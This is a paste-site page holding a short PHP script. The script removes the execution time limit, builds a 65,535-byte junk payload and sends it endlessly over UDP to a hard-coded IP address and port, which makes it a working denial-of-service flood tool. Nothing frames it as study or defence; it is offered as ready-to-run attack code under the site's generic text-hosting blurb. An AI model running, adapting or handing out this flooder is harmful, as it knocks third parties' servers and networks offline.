- <?php
- set_time_limit(0);
- //ignore_user_abort(FALSE);
- $ip = "186.223.187.133
- ";
- $rand = 7777;
- $out = "";
- for($i=0;$i<65535;$i++){
- $out .= "X";
- }
- while(1) {
- $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
- if($fp){
- fwrite($fp, $out);
- fclose($fp);
- }
- }
- ?>
FREE TEXT HOST
You can save codes, scripts, sources & general debugging text and share / access / use them at any time (anonymously).You can even set yourself a password if you want to keep it just for yourself.